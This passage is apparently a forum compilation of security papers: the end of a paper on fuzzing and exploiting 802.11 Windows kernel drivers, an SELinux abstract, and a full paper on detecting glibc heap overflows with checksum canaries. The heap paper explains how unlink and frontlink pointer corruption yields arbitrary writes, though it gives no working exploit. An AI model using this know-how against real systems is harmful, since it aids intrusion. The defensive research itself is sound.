vulnerabilities is now becoming common place on modern desktop platforms. This represents a marked improvement that should, in the long run, make the exploitation of many user-mode vulnerabilities much more difficult or even impossible. That being said, there is an apparent lack of equivalent technology that can help to prevent the exploitation of kernel-mode vulnerabilities. The public justification for the lack of equivalent technology typically centers around the argument that kernel-mode vulnerabilities are difficult to exploit and are too few in number to actually warrant the integration of exploit prevention features. In actuality, sad though it may seem, the justification really boils down to a business cost issue. At present, kernel-mode vulnerabilities don't account for enough money in lost revenue to support the time investment needed to implement and test kernel-mode exploit prevention features. In the interest of helping to balance the business cost equation, the authors have described a process that can be used to identify and exploit 802.11 wireless device driver vulnerabilities on Windows. This process includes steps that can be taken to fuzz the different ways in which 802.11 device drivers process 802.11 packets. In certain cases, flaws may be detected in a particular device driver's processing of certain packets, such as Beacon requests and Probe responses. When these flaws are detected, exploits can be developed using the features that have been integrated into the 3.0 version of the Metasploit Framework that help to streamline the process of transmitting crafted 802.11 packets in an effort to gain code execution. Through the description of this process, it is hoped that the reader will see that kernel-mode vulnerabilities can be just as easy to identify and exploit as user-mode. Furthermore, it is hoped that this description will help to eliminate the false impression that all kernel-mode vulnerabilities are much more difficult to exploit (keeping in mind, of course, that there are indeed kernel-mode vulnerabilities that are difficult to exploit in just the same way that there are indeed user-mode vulnerabilities that are difficult to exploit). While an emphasis has been put upon 802.11 wireless device drivers, many different device drivers have the potential for exposing vulnerabilities. Looking toward the future, there are many different opportunities for research, both from an attack and defense point of view. From an attack point of view, there's no shortage of interesting research topics. As it relates to 802.11 wireless device driver vulnerabilities, much more advanced 802.11 protocol fuzzers can be developed that are capable of reaching features exposed by all of the protocol client states rather than focusing on the unauthenticated and unassociated state. For device drivers in general, the development of fuzzers that attack the IOCTL interface exposed by device objects would provide good insight into a wide range of locally exposed vulnerabilities. Aside from techniques used to identify vulnerabilities, it's expected that researching of techniques used to actually take advantage of different types of kernel-mode vulnerabilities will continue to evolve and become more reliable. From a defense point of view, there is a definite need for research that is focused on making the exploitation of kernel-mode vulnerabilities either impossible or less reliable. It will be interesting to see what the future holds for kernel-mode vulnerabilities. Bibliography [1] bugcheck and skape. Windows Kernel-mode Payload Fundamentals. http://www.uninformed.org/?v=3&a=4&t=sumry; accessed Dec 2, 2006. [2] eEye. Remote Windows Kernel Exploitation - Step Into the Ring 0. http://research.eeye.com/html/Papers/download/StepIntoTheRing.pdf; accessed Dec 2, 2006. [3] Gast, Matthew S. 802.11 Wireless Networks - The Definitive Guide. http://www.oreilly.com/catalog/802dot11/; accessed Dec 2, 2006. [4] Lemos, Robert. Device drivers filled with flaws, threaten security. http://www.securityfocus.com/news/11189; accessed Dec 2, 2006. [5] SoBeIt. Windows Kernel Pool Overflow Exploitation. http://xcon.xfocus.org/xcon2005/archives/2005/Xcon2005_SoBeIt.pdf; accessed Dec 2, 2006. Sursa: http://www.uninformed.org/?v=6&a=2&t=txt
  3. Secure computing: SELinux Michael Wikberg Helsinki University of Technology Michael.Wikberg@wikberg.fi Abstract Using mandatory access control greatly increases the security of an operating system. SELinux, which is an implementation of Linux Security Modules (LSM), implements several measures to prevent unauthorized system usage. The security architecture used is named Flask, and provides a clean separation of security policy and enforcement. This paper is an overview of the Flask architecture and the implementation in Linux. KEYWORDS: SELinux, MAC, Security, Kernel, Linux, LSM, TE, RBAC, MLS Download: www.tml.tkk.fi/Publications/C/25/papers/Wikberg_final.pdf
  4. Run-time Detection of Heap-based Overflows William Robertson, Christopher Kruegel, Darren Mutz, and Fredrik Valeur - University of California, Santa Barbara Abstract Buffer overflows belong to the most common class of attacks on today's Internet. Although stack-based variants are still by far more frequent and well-understood, heap-based overflows have recently gained more attention. Several real-world exploits have been published that corrupt heap management information and allow arbitrary code execution with the privileges of the victim process. This paper presents a technique that protects the heap management information and allows for run-time detection of heap-based overflows. We discuss the structure of these attacks and our proposed detection scheme that has been implemented as a patch to the GNU Lib C. We report the results of our experiments, which demonstrate the detection effectiveness and performance impact of our approach. In addition, we discuss different mechanisms to deploy the memory protection. Introduction Buffer overflow exploits belong to the most feared class of attacks on today's Internet. Since buffer overflow techniques have reached a broader audience, in part due to the Morris Internet worm [1] and the Phrack article by AlephOne [2], new vulnerabilities are being discovered and exploited on a regular basis. A recent survey [3] confirms that about 50% of vulnerabilities reported to CERT are buffer overflow related. The most common type of buffer overflow attack is based on stack corruption. This variant exploits the fact that the return addresses for procedure calls are stored together with local variables on the program's stack. Overflowing a local variable can thus overwrite a return address, redirecting program flow when the function returns. This potentially allows a malicious user to execute arbitrary code. Recently, however, buffer overflows that corrupt the heap have gained more attention. Several CERT advisories [4, 5] describe exploits that affect widely deployed programs. Heap-based overflows can be divided into two classes: One class [6] comprises attacks where the overflow of a buffer allocated on the heap directly alters the content of an adjacent memory block. The other class [7, 8] comprises exploits that alter management information used by the memory manager (i.e., malloc and free functions). Most malloc implementations share the behavior of storing management information within the heap space itself. The central idea of the attack is to modify the management information in a way that will allow subsequent arbitrary memory overwrites. In this way, return addresses, linkage tables or application level data can be altered. Such an attack was first demonstrated by Solar Designer [9]. This paper introduces a technique that protects the management information of boundary-tag-based heap managers against malicious or accidental modification. The idea has been implemented in Doug Lea's malloc for GNU Lib C, version 2.3 [10], utilized by Linux and Hurd. It could, however, be easily extended to other systems such as various free BSD distributions. Using our modified C library, programs are protected against attacks that attempt to tamper with heap management information. It also helps to detect programming errors that accidentally overwrite memory chunks, although not as complete and verbose as available memory debuggers. Program recompilation is not required to enable this protection. Every application that is dynamically linked against Lib C is secured once our patch has been applied. Related Work Much research has been done on the prevention and detection of stack-based overflows. A well-known result is StackGuard [11], a compiler extension that inserts a `canary' word before each function return address on the stack. When executing a stack-based attack, the intruder attempts to overflow a local buffer allocated on the stack to alter the return address of the function that is currently executing. This might permit the attacker to redirect the flow of execution and take control of the running process. By inserting a canary word between the return address and the local variables, overflows that extend into the return address will also change this canary and thus, can be detected. There are different mechanisms to prevent an attacker from simply including the canary word in his overflow and rendering the protection ineffective. One solution is to choose a random canary value on process startup (i.e., on exec) that is infeasible to guess. Another solution uses a terminator canary that consists of four different bytes commonly utilized as string terminator characters in string manipulation library functions (such as strcpy). The idea is that the attacker is required to insert these characters in the string used to overflow the buffer to overwrite the canary and remain undetected. However, the string manipulation functions will stop when encountering a terminator character and thus, the return address remains intact. A similar idea is realized by StackShield [12]. Instead of inserting the canary into the stack, however, a second stack is kept that only stores copies of the return addresses. Before a procedure returns, the copy is compared to the original and any deviations lead to the abortion of the process. Stack-based overflows exploit the fact that management information (the function return address) and data (automatic variables and buffers) are stored together. StackGuard and StackShield are both approaches to enforcing the integrity of in-band management information on the stack. Our technique builds upon this idea and extends the protection to management information in the heap. Other solutions to prevent stack-based overflows are not enforced by the compiler but implemented as libraries. Libsafe and Libverify [13, 14] implement and override unsafe functions of the C library (such as strcpy, fscanf, getwd). The safe versions estimate a safe boundary for buffers on the stack at run-time and check this boundary before any write to a buffer is permitted. This prevents user input from overwriting the function return address. Another possibility is to make the stack segment non-executable [15]. Although this does not protect against the actual overflow and the modification of the return address, the solution is based on the observation that many exploits execute their malicious payload directly on the stack. This approach has the problem of potentially breaking legitimate uses such as functional programming languages that generate code during run-time and execute it on the stack. Also, gcc uses executable stacks as function trampolines for nested functions and Linux uses executable user stacks for signal handling. The solution to this problem is to detect legitimate uses and dynamically re-enable execution. However, this opens a window of vulnerability and is hard to do in a general way. Less work has been done on protecting heap memory. Non-executable heap extensions [16, 17] that operate similar to their non-executable stack cousins have been proposed. However, they do not prevent buffer overflows from occurring and an attacker can still modify heap management information or overwrite function pointers. They also suffer from breaking applications that dynamically generate and execute code in the heap. Systems that provide memory protection are memory debuggers, such as Valgrind [18] or Electric Fence [19]. These tools supervise memory access (read and write) and intercept memory management calls (e.g., malloc) to detect errors. These tools use an approach similar to ours in that they attempt to maintain the integrity of the utilized memory. However, a check is inserted on every memory access, while our approach only performs a check when allocating or deallocating memory chunks. Memory debuggers effectively prevent unauthorized memory access and stop heap-based buffer overflows. Yet, they also impose a serious performance penalty on the monitored programs, which often run an order of magnitude slower. This is not acceptable for most production systems. A recent posting on bugtraq pointed to an article [20] that discusses several techniques to protect stack and heap memory against overflows. The presented heap protection mechanism follows similar ideas as our work as it aims at protecting heap management information. However, no details were provided and no implementation or evaluation of their technique exists. A possibility of preventing stack-based and heap-based overflows altogether is the use of type-safe languages such as Java. Alternatively, solutions have been proposed [21] that provide safe pointers for C. All these systems can only be attacked by exploiting vulnerabilities [22, 23] in the mechanisms that enforce the type safety (e.g., bytecode verifier). Note, however, that safe C systems typically require new compilers and recompilation of all applications to be protected. Technique Heap Management in GNU Lib C (glibc) The C programming language provides no built-in facilities for performing common operations such as dynamic memory management, string manipulation or input/output. Instead, these facilities are defined in a standard library, which is compiled and linked with user applications. The GNU C library [10] is such a library that defines all library functions specified by the ISO C standard [24], as well as additional features specific to POSIX [25] and extensions specific to the GNU system [26]. Two kinds of memory allocation, static and automatic, are directly supported by the C programming language. Static allocation is used when a variable is declared as static or global. Each static or global variable defines one block of space of a fixed size. The space is allocated once, on program startup as part of the exec operation and is never freed. Automatic allocation is used for automatic variables such as a function arguments or local variables. The space for an automatic variable is automatically allocated on the stack when the compound statement containing the declaration is entered, and is freed when that compound statement is exited. A third important kind of memory allocation, dynamic allocation, is not supported by C variables but is available via glibc functions. Dynamic memory allocation is a technique in which programs determine during run-time where information should be stored. It is needed when the amount of required memory or when the lifecycle of memory usage depends on factors that are not known a-priori. The two basic functions provided are one to dynamically allocate a block of memory (malloc), and one to return a previously allocated block to the system (free). Other routines (such as calloc, realloc) are then implemented on top of these two procedures. GNU Lib C uses Doug Lea's memory allocator dlmalloc [27] to implement the dynamic memory allocation functions. dlmalloc utilizes two core features, boundary tags and binning, to manage memory requests and releases on behalf of user programs. Memory management is based on `chunks,' memory blocks that consist of application usable regions and additional in-band management information. The in-band information, also called boundary tag, is stored at the beginning of each chunk and holds the sizes of the current and the previous chunk. This allows for coalescing two bordering unused chunks into one larger chunk, minimizing the number of unusable small chunks as a result of fragmentation. Also, all chunks can be traversed starting from any known chunk in either a forward or backward direction. Chunks that are currently not in use by the application (i.e., free chunks) are maintained in bins, grouped by size. Bins for sizes less than 512 bytes each hold chunks of only exactly one size; for sizes equal to or greater than 512 bytes, the size ranges are approximately logarithmically increasing. Searches for available chunks are processed in smallest-first, best-fit order, starting at the appropriate bin depending on the memory size requested. For unallocated chunks, the management information (boundary tag) includes two pointers for storing the chunk in a double linked list (called free list) associated with each bin. These list pointers are called forward (fd) and back (bk). On 32-bit architectures, the management information always contains two 4-byte size-information fields (the chunk size and the previous chunk size). When the chunk is unallocated, it also contains two 4-byte pointers that are utilized to manipulate the double linked list of free chunks for the binning. This basic algorithm is known to be very efficient. Although it is based upon a search mechanism to find best fits, the use of indexing techniques (i.e., binning) and the exploitation of special cases lead to average cases requiring only a few dozen instructions, depending on the machine and the allocation pattern. A number of heuristic improvements have also been incorporated into the memory management algorithm in addition to the main techniques. These include locality preservation, wilderness preservation, memory mapping, and caching [28]. Anatomy of a Heap Overflow Exploit The use of in-band forward and back pointers to link available chunks in bins exposes glibc's memory management routines to a security vulnerability. If a malicious user is able to overflow a dynamically allocated block of memory, that user could overwrite the next contiguous chunk header in memory. When the overflown chunk is unallocated, and thus in a bin's double linked list, the attacker can control the values of that chunk's forward and back pointers. Given this information, consider the unlink macro used by glibc shown below: #define unlink(P, BK, FD) { \ [1] FD = P->fd; \ [2] BK = P->bk; \ [3] FD->bk = BK; \ [4] BK->fd = FD; \ } Intended to remove a chunk from a bin's free list, the unlink routine can be subverted by a malicious user to write an arbitrary value to any address in memory. In the unlink macro shown above, the first parameter P points to the chunk that is about to be removed from the double linked list. The attacker has to store the address of a pointer (minus 12 bytes, as explained below) in are read and stored in the temporary variables FD and BK, respectively. At line [3], FD gets dereferenced and the address located at FD plus 12 bytes (the offset of the bk field within a boundary tag) is overwritten with the value stored in BK. This technique can be utilized, for example, to change an entry in the program's GOT (Global Offset Table) and redirect a function pointer to code of the attacker's choice. A similar situation occurs with the frontlink macro (shown in Figure 1). The task of this macro is to store the chunk of size S, pointed to by P, at the appropriate position in the double linked list of the bin with index IDX. FD is initialized with a pointer to the start of the list of the appropriate bin at line [1]. The loop at line [2] searches the double linked list to find the first chunk that is larger than P or the end of the list by following consecutive forward pointers (at line [3]). Note that every list stores chunks ordered by increasing sizes to facilitate a fast smallest-first search in case of memory allocations. When an attacker manages to overwrite the forward pointer of one of the traversed chunks with the address of a carefully crafted fake chunk, he could trick frontlink into leaving the loop (at line [2]) with FD pointing to this fake chunk. Next, the back pointer BK of that fake chunk would be read at line [4] and the integer located at BK plus 8 bytes (8 is the offset of the fd field within a boundary tag) would be overwritten with the address of the chunk P at line [5]. The attacker could store the address of a function pointer (minus 8 bytes) in the bk field of the fake chunk, and therefore trick frontlink into overwriting #define frontlink(A, P, S, IDX, BK, FD) { \ ... [1] FD = start_of_bin(IDX); [2] while ( FD != BK && S < chunksize(FD) ) { \ [3] FD = FD->fd; \ } \ [4] BK = FD->bk; \ ... [5] FD->bk = BK->fd = P; \ Figure 1: frontlink Macro. this function pointer with the address of the chunk P at line [5]. Although this macro does not allow arbitrary values to be written, the attacker may be able to store valid machine code at the address of P. This code would then be executed the next time the function pointed to by the overwritten integer is called. Figure 2: Original memory chunk structure and memory layout. A variation on the heap overflow exploit described above is also possible, involving the manipulation of a chunk's size field instead of its list pointers. An attacker can supply arbitrary values to an adjacent chunk's size field, similar to the manipulation the list pointers. When the size field is accessed, for example during the coalescing of two unused chunks, the heap management routines can be tricked into considering an arbitrary location in memory, possibly under the attacker's control, as the next chunk. An attacker can set up a fake chunk header at this location in order to perform an attack as discussed above. If an attacker is, for some reason, unable to write to the list pointers of an adjacent chunk header but is able to reach the adjacent chunk's size field, this attack represents a viable alternative. Heap Integrity Detection In order to protect the heap, our system makes several modifications to glibc's heap manager, both in the structure of individual chunks as well as the management routines themselves. Figure 3: Modified memory chunk structure and memory layout. Figure 2 depicts the original structure of a memory chunk in glibc. The first element in protecting each chunk's management information is to prepend a canary to the chunk structure, as shown in Figure 3. An additional padding field, __pad0, is also added (dlmalloc requires the size of a header of a used chunk to be a power of two). The canary contains a checksum of the chunk header seeded with a random value, described below. The second necessary element of our heap protection system is to introduce a global checksum seed value, which is held in a static variable (called __heap_magic). This variable is initialized during process startup with a random value, which is then protected against further writes by a call to mprotect. This is in contrast to stack protection schemes [29] that rely on repetitive calls to mprotect; since we only require a single invocation during process startup, we do not suffer from any related run-time performance loss associated with other schemes. The final element of the heap protection system is to augment the heap management routines with code to manage and check each chunk's canary. Newly allocated chunks to be returned from malloc have their canary initialized to a checksum covering their memory location and size fields, seeded with the global value of __heap_magic. Note that the checksum function does not cover the list pointer fields for allocated chunks, since these fields are part of the chunk's user data section. The new chunk is then released to the application. When a chunk is returned to the heap management through a call to free, the chunk's canary is checked against the checksum calculation performed when the chunk was released to the application. If the stored value does not match the current calculation, a corruption of the management information is assumed. At this point, an alert is raised, and the process is aborted. Otherwise, normal processing continues; the chunk is inserted into a bin and coalesced with bordering free chunks as necessary. Any free list manipulations which take place during this process are prefaced with a check of the involved chunks' canary values. After the deallocated chunk has been inserted into the free list, its canary is updated with a checksum covering its memory location, size fields, and list pointers, again seeded with the value of __heap_magic. The elements described above effectively prevent writes to arbitrary locations in memory by modifying a chunk's header fields without being detected, whether through an overflow into or through direct manipulation of the chunk header fields. Each allocated chunk is protected by a randomly- seeded checksum over its memory location and size fields, and each free chunk is protected by a randomly-seeded checksum over its memory location, size fields, and list pointers. Each access of a list pointer is protected by a check to insure that the integrity of the pointers has not been violated. Also, each use of the size field is protected. Furthermore, the checksum seed has been protected against malicious writes to guarantee that it cannot be overwritten with a value chosen by the attacker. As a beneficial side-effect, common programming errors such as unintended heap overflows or double invocations of free are detected by this system as well. A double call to free refers to the situation where a programmer mistakenly attempts to deallocate the same chunk twice. This error is detected due to a checksum mismatch. When the chunk is deallocated for the first time, its canary is updated to a new value reflecting its position on the free list. When the second call to free is executed, the checksum is checked again, with the assumption that it is an allocated chunk. However, since the canary has been updated and the check fails, an alarm is raised. A limitation of our approach is the fact that we do not address general pointer corruption attacks, such as subversion of an application's function pointers. The system does not guarantee the integrity of user data contained within chunks in the heap; rather, the system guarantees only that the chunk headers themselves are valid. It is also worth noting that the heap implementation included with glibc already contains functionality that attempts to ensure the integrity of the heap management information for debugging purposes. However, use of the debugging routines incurs significant cost in a production environment. The routines perform a full scan of the heap's free lists and global state during each execution of a heap management function, and include checks unrelated to heap pointer exploitation. Furthermore, there is no guarantee that all attacks are detected. Not all list manipulations are checked, and malicious values could pass integrity checks which are not specifically intended to protect against malicious overflows. Thus, we conclude that the included debugging functionality is not suitable for protecting against the vulnerabilities that we address. The system described above has been implemented for glibc 2.3 and glibc 2.2.9x, pre-release versions of glibc 2.3 utilized by RedHat 8.0. However, the techniques developed for glibc are easily adaptable to other heap designs, including those shipped with the various BSD derivatives or commercial Unix implementations. Thus, further work is planned to apply this technique to other popular open systems besides glibc. Evaluation The purpose of this section is to experimentally verify the effectiveness of our heap protection technique. We also discuss the performance impact of our proposed extension and its stability. To assess the ability of our protection scheme, we obtained several real- world exploits that perform heap overflow attacks against vulnerable programs. These were WU-Ftpd File Globbing Heap Corruption Vulnerability [30] against wuftpd 2.6.0, Sudo Password Prompt Heap Overflow Vulnerability [31] against sudo 1.6.3, and CVS Directory Request Double Free Heap Corruption Vulnerability [32] against cvs 1.11.4. In addition, we used two proof-of-concept programs presented in [8] that demonstrate examples of the exploit techniques using the unlink and the frontlink macro, respectively. We also developed a variant of the unlink exploit to demonstrate that dlmalloc's debugging routines can be easily evaded and do not provide protection comparable to our technique. All vulnerable programs were run under RedHat Linux 8.0. The exploits have been executed three times, once with the default C library (i.e., glibc 2.2.93), once with the patched library including our heap integrity code, and once with the default C library and enabled debugging. The third run was performed to determine the effectiveness of the built-in debugging mechanisms in detecting heap-based overflows. Table 1 shows the results of our experiments. A column entry of `shell' indicates that an exploit was successful and provided an interactive shell with the credentials of the vulnerable process. A `segfault' entry indicates that the exploit successfully corrupted the heap, but failed to run arbitrary code (note that it might still be possible to change the exploit to gain elevated privileges). `aborted' means that the memory corruption has been successfully detected and the process has been terminated. The results show that our technique was successful in detecting all corruptions of in-bound management information, and safely terminated the processes. Note that the built-in debugging support is also relatively effective in detecting inconsistencies, however, it does not offer complete protection and imposes a significantly higher performance penalty than our patch. [TABLE][TR] [TD]Package[/TD] [TD]glibc[/TD] [TD]glibc + heap prot.[/TD] [TD]glibc + debugging[/TD] [/TR] [TR] [/TR] [TR] [TD]WU-Ftpd[/TD] [TD]shell[/TD] [TD]aborted[/TD] [TD]aborted[/TD] [/TR] [TR] [TD]Sudo[/TD] [TD]shell[/TD] [TD]aborted[/TD] [TD]aborted[/TD] [/TR] [TR] [TD]CVS[/TD] [TD]segfault[/TD] [TD]aborted[/TD] [TD]aborted[/TD] [/TR] [TR] [TD]unlink[/TD] [TD]shell[/TD] [TD]aborted[/TD] [TD]aborted[/TD] [/TR] [TR] [TD]frontlink[/TD] [TD]shell[/TD] [TD]aborted[/TD] [TD]aborted[/TD] [/TR] [TR] [TD]debug evade[/TD] [TD]shell[/TD] [TD]aborted[/TD] [TD]shell[/TD] [/TR] [/TABLE] Table 1: Detection effectiveness. [TABLE][TR] [TD]Package[/TD] [TD]glibc[/TD] [TD]glibc + heap prot.[/TD] [TD]glibc + debugging[/TD] [/TR] [TR] [/TR] [TR] [TD]Loop[/TD] [TD]1,587[/TD] [TD]2,033 (+ 28%)[/TD] [TD]2,621 (+ 65%)[/TD] [/TR] [TR] [TD]AIM 9[/TD] [TD]5,094[/TD] [TD]5,338 (+ 5%)[/TD] [TD]7,603 (+ 49%)[/TD] [/TR] [/TABLE] Table 2: Micro-Benchmarks. The performance impact of our scheme has been measured using several micro- and macro-benchmarks. We are aware of the fact that the memory management routines are an important part of almost all applications, and therefore, it is necessary to implement them efficiently. It is obvious that our protection approach inflicts a certain amount of overhead, but we also claim that this overhead is tolerable for most real-world applications and is easily compensated for by the increase in security. To get a baseline for the worst slowdown that can be expected, we wrote a simple micro-benchmark that allocates and frees around four million (to be more precise, 222) objects of random sizes between 0 and 1024 bytes in a tight loop. The maximum size of 1024 was chosen to obtain a balanced distribution of objects in dedicated bins (for chunks with sizes less than 512 bytes) and objects in bins that cover a range of different sizes (for chunks with sizes greater than or equal to 512 bytes). We also utilized the dynamic memory benchmark present in the AIM 9 test suite [33]. Table 2 shows the average run- time in milliseconds over 100 iterations for the two micro-benchmarks. We provide results for a system with the default glibc, the glibc with heap protection and the glibc with debugging. For more realistic measurements that reflect the impact on real-world applications, we utilized Mindcraft's WebStone [34] and OSDB [35]. WebStone is a client-server benchmark for HTTP servers that issues a number of HTTP GET requests for specific pages on a Web server and measures the throughput and response latency of each HTTP transfer. OSDB (open source database benchmark) is a benchmark that evaluates the I/O throughput and general processing power of GNU Linux systems. It is a test suite built on AS3AP, the ANSI SQL Scalable and Portable Benchmark, for evaluating the performance of database systems. Figure 4 and Figure 5 show the throughput and the response latency measurements for an increasing number of HTTP clients in the WebStone benchmark, for both the default glibc and the patched version. We used an Intel Pentium 4 with 1.8 GHz, 1 GB RAM, Linux RedHat 8.0, and a 3COM 905C-TX NIC for the experiments, running Apache 2.0.40. It can be seen that even for hundred simultaneous clients, virtually no performance impact was recorded. Similar results have been obtained for OSDB 0.15.1. The following Table 3 shows the measurements for 10 parallel clients that used our test machine (the same as above) to full capacity, running a PostgreSQL 7.2.3 database. The results show the total run-time in seconds for the single-user and multi-user tests. We also attempted to assess the stability of the patched library over an extended period in time. For this purpose, the patch was installed on the Lab's web server (running Apache 2.0.40) and CVS server (running cvs 1.11.60). A patched library was also used on two desktop machines, running RedHat 8.0 and Gentoo 1.4, respectively. Although the web server only receives a small number of requests, the CVS server is regularly used for our software development and the desktop machines are the workstations of two of the authors. All machines were stable and have been running without any problems for a period of several weeks. Figure 4: HTTP client response time. Figure 5: HTTP client throughput. [TABLE][TR] [TD]Package[/TD] [TD]glibc[/TD] [TD]glibc + heap prot.[/TD] [/TR] [TR] [/TR] [TR] [TD]OSDB[/TD] [TD]6,015[/TD] [TD]6,070 (+ 0.91%)[/TD] [/TR] [/TABLE] Table 3: OSDB benchmark. Installation Several methods of deploying our heap protection system have been developed, in order to accommodate various system environments and levels of desired protection. Many important security mechanisms are not applied because of the complexity and the required effort during setup. We provide different avenues that range from the installation of a pre-compiled package (with minimal effort) to a complete source rebuild of glibc. One method is to download and install our library modifications as a source patch against glibc. Administrators can select the version appropriate to their system and apply it against a pristine glibc source tree before proceeding with the usual glibc source installation procedure. Source-based distributions, such as Gentoo Linux, can also easily incorporate these patches into their packaging system. A second method of deploying is to create packages for various distributions of Linux that replace the system glibc image with a version containing our modifications (such as RedHat RPMs). The advantage of this approach is that virtually all applications on the target machine will be automatically protected against heap overflow exploitation, with the exception of those applications which are statically linked against glibc or perform their own memory management. A possible disadvantage is that these applications will also experience some level of performance degradation, which could be prohibitive in some high-performance environments. A third method of deploying our heap protection system uses packages that install a protected glibc image alongside the existing image, instead of replacing the system's glibc image altogether. A script is provided that utilizes the system loader's LD_ PRELOAD functionality to substitute the protected glibc image for the system image for an individual application. This allows an administrator to selectively enable protection only for certain applications (e.g., an administrator may not feel it necessary to protect applications which cannot be executed remotely, and therefore may wish to only protect those applications which are network-accessible). This is also a suitable path for admins that are afraid of potentially destabilizing their entire system by performing a system-wide deployment of a heap modification which has not undergone the extensive real-world testing that standalone dlmalloc has. All of the described installation methods are documented in detail on our website, located at http://www.cs.ucsb.edu/~rsg/heap/. Packages for various popular distributions and source patches can be downloaded as well. Conclusions This paper presents a technique for detecting heap-based overflows that tamper with in-band memory management data structures. We discuss different ways to mount such attacks and show our mechanism to detect and prevent them. We implemented a patch for glibc 2.3 that extends the utilized data structures with a canary that stores a checksum over the sensitive data. This checksum calculation involves a secret seed that makes it infeasible for an intruder to guess or fake the canary in an attack. Experience shows that system administrators are often reluctant to adopt security measures in the systems they administer. Installing new tools may require significant effort to understand how to best apply the technology in the administrator's network, as well as investment in training end users. Additionally, applying a new tool may interfere with existing critical systems or impose unacceptable run-time overhead. This paper introduces a heap protection mechanism that increases application security in a way that is nearly transparent to the functioning of applications and is invisible to users. Applying the system to existing installations has few drawbacks. Recompilation of applications is rarely required, and the system imposes minimal overhead on application performance. Acknowledgments This research was supported by the Army Research Office, under agreement DAAD19-01-1- 0484. The U.S. Government is authorized to reproduce and distribute reprints for Governmental purposes notwithstanding any copyright annotation thereon. The views and conclusions contained herein are those of the author and should not be interpreted as necessarily representing the official policies or endorsements, either expressed or implied, of the Army Research Office, or the U.S. Government. Author Information Christopher Kruegel is working as a research postgraduate in the Reliable Software Group at the University of California, Santa Barbara. Previously, he was an assistant professor at the Distributed Systems Group at the Technical University Vienna. Kruegel holds the M.S. and Ph.D. degrees in computer science from the Technical University Vienna. His research focus is on network security, with an emphasis on intrusion detection. You can contact him at chris@cs.ucsb.edu. Darren Mutz is a doctoral student in the Computer Science department at the University of California, Santa Barbara. His research interests are in network security and intrusion detection. From 1997 to 2001 he was employed as a member of technical staff in the Planning and Scheduling Group at the Jet Propulsion Laboratory where he engaged in research efforts focused on applying AI, machine learning, and optimization methodologies to problems in space exploration. He holds a B.S. degree in Computer Science from UCSB and can be contacted at dhm@cs.ucsb.edu. William Robertson is a first-year PhD student in the Computer Science department at the University of California, Santa Barbara. His research interests include intrusion detection, hardening of computer systems, and routing security. He received his B.S. degree in Computer Science from UC Santa Barbara, and can be reached electronically at wkr@cs.ucsb.edu. Fredrik Valeur is currently a Ph.D. student at UC Santa Barbara. He holds a Sivilingenioer degree in Computer Science from the Norwegian University of Science and Technology. His research interests include intrusion detection, network security and network scanning techniques. He can be contacted at fredrik@cs.ucsb.edu. References [1] Spafford, E., "The Internet Work Program," Analysis Computer Communication Review, 1998. [2] AlephOne, Smashing the Stack for Fun and Profit, http://www.phrack.org/phrack/49/P49-14. [3] Wilander, J. and M. Kamkar, "Comparison of Publicly Available Tools for Dynamic Buffer Overflow Prevention," 10th Network and Distributed System Security Symposium, 2003. [4] CERT Advisory CA-2002-11, "Heap Overflow in Cachefs Daemon (cachefsd)," CERT Advisory CA-2002-11 Heap Overflow in Cachefs Daemon (cachefsd). [5] CERT Advisory CA-2002-33, "Heap Overflow Vulnerability in Microsoft Data Access Components (MDAC)," CERT Advisory CA-2002-33 Heap Overflow Vulnerability in Microsoft Data Access Components (MDAC). [6] Conover, M., w00w00 on Heap Overflows, http://www.w00w00.org/files/articles/heaptut.txt. [7] anonymous, Once upon a free(), http://www.phrack.org/phrack/57/p57-0x09. [8] Kaempf, M., Vudo malloc tricks, http://www.phrack.org/phrack/57/p57-0x08. [9] Designer, Solar, JPEG COM Marker Processing Vulnerability in Netscape Browsers, JPEG COM Marker Processing Vulnerability in Netscape Browsers and Microsoft Products, and a generic heap-based buffer overflow exploitation technique. [10] The GNU C Library, The GNU C Library. [11] Cowan, C., et al., "StackGuard: Automatic Adaptive Detection and Prevention of Buffer-Overflow Attacks," 7th USENIX Security Conference, 1998. [12] Vendicator, Stack Shield Technical Info, Stack Shield. [13] Baratloo, A., N. Singh and T. Tsai, Libsafe: Protecting critical elements of stacks, Avaya Business Communications Research & Development - Avaya Labs. [14] Baratloo, A., N. Singh and T. Tsai, "Transparent Run-time Defense Against Stack Smashing Attacks," USENIX Annual Technical Conference, 2000. [15] Designer, Solar, Non-executable stack patch, Openwall - bringing security into open computing environments. [16] RSX: Run-time addressSpace eXtender, http://www.starzetz.com/software/rsx/index.html. [17] PAX: Non-executable heap-segments, http://pageexec.virtualave.net/index.html. [18] Valgrind, an open-source memory debugger for x86-GNU/Linux, http://developer.kde.org/~sewardj/index.html. [19] Electric Fence - Memory Debugger, http://www.gnu.org/directory/devel/debug/ElectricFence.html. [20] Huang, Y., Protection Against Exploitation of Stack and Heap Overflows, http://members.rogers.com/exurity/pdf/AntiOverflows.pdf. [21] Necula, George C., Scott McPeak, and Westley Weimer, "CCured: Type- safe retrotting of legacy code," 29th ACM Symposium on Principles of Programming Languages, 2002. [22] Dean, D., E. Felten and D. Wallach, "Java Security: From HotJava to Netscape and Beyond," IEEE Symposium on Security and Privacy, 1996. [23] The Last Stage of Delirium (LSD), Java and Java Virtual Machine Vulnerabilities and their Exploitation Techniques, http://www.lsd-pl.net/java_security.html. [24] ISO JTC 1/SC 22/WG 14 - C, http://std.dkuug.dk/JTC1/SC22/WG14/index.html. [25] ISO JTC 1/SC 22/WG 15 - POSIX, ISO/IEC JTC1/SC22/WG15 - POSIX. [26] The GNU C Library Manual, http://www.gnu.org/manual/glibc-2.2.5/libc.html. [27] Lea, D., A Memory Allocator, A Memory Allocator. [28] Wilson, P., M. Johnstone, M. Neely, and D. Boles, "Dynamic Storage Allocation: A Survey and Critical Review," International Workshop on Memory Management, 1995. [29] Chiueh, T., and F. Hsu, "RAD: A Compile-time Solution to Buffer Overflow Attacks," 21st Conference on Distributed Computing Systems, 2001. [30] WU-Ftpd File Globbing Heap Corruption Vulnerability, Wu-Ftpd File Globbing Heap Corruption Vulnerability. [31] Sudo Password Prompt Heap Overflow Vulnerability, Sudo Password Prompt Heap Overflow Vulnerability. [32] CVS Directory Request Double Free Heap Corruption Vulnerability, CVS Directory Request Double Free Heap Corruption Vulnerability. [33] AIM IX Benchmarks, http://www.caldera.com/developers/community/contrib/aim.html. [34] Mindcraft WebStone - The Benchmark for Web Servers, Mindcraft - WebStone Benchmark Information. [35] OSDB - The Open Source Database Benchmark, The Open Source Database Benchmark. Sursa: LISA '03
